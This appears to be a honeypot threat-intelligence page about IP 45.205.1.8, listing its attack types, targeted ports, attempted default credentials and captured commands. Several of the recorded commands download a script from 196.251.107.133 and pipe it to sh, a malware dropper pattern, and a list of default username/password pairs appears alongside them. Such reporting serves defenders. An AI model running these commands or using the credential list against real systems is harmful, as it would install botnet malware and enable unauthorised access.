TROYANOSYVIRUS
Active Threat β€’ CRITICAL

45.205.1.8

First Detection3/4/2026
Last Activity4/5/2026
ISPVpsvault.host Ltd
🎯
13,111
Total Attacks
πŸ”Œ
61
Ports
πŸ“‘
8
Attack Types
🦠
7
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS215925
ISP
Vpsvault.host Ltd

Attack Types

tcp_trap
ssh_telnet_honeypot
yaml_exploit_honeypot
adb_honeypot
malware_capture
web_honeypot
tcp_trap
cisco_asa_honeypot

Attacked Ports

2380814431883232330003128456750385050505155545555555655575558555955855587+41

Associated Malware

Attempted Credentials

πŸ”wget/tftp
1516x
πŸ”root/root
56x
πŸ”admin/admin123
56x
πŸ”admin/root
55x
πŸ”oracle/oracle
55x
πŸ”tech/tech
55x
πŸ”factory/factory
54x
πŸ”root/password
53x
πŸ”root/1234
53x
πŸ”debug/debug
48x
πŸ”ffadmin/ffadminff
45x
πŸ”root/(empty)
44x
πŸ”admin/54321
43x
πŸ”admin/meinsm
40x
πŸ”admin/admin
39x

Executed Commands

$wget -qO- http://196.251.107.133/bins/sin.sh32x
$cd / ;( wget -qO- http://196.251.107.133/bins/sin.sh | sh) &32x
$cd /tmp;nohup sh -c 'wget -qO- http://196.251.107.133/bins/sin.sh|sh' </dev/null 2>/dev/null &32x
$cd /dev/shm;wget -qO- http://196.251.107.133/bins/sin.sh|sh &16x
$cd /tmp||cd /var/run||cd /var/tmp||cd /mnt||cd /root||cd /;(wget -qO- http://196.251.107.133/bins/sin.sh|sh)&16x
$cd /tmp;wget -O- http://196.251.107.133/bins/sin.sh|sh &16x
$curl: option -L not recognized curl: try 'curl --help' or 'curl --manual' for more information16x
$cd /var/tmp;wget -qO- http://196.251.107.133/bins/sin.sh|sh &16x
$ifconfig16x
$curl: option -f not recognized curl: try 'curl --help' or 'curl --manual' for more information16x

GreyNoise ContextGreyNoise

Classification
malicious
Name
unknown
Last Seen
3/26/2026

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1

Risk Assessment

100
/100
LowMediumHighCritical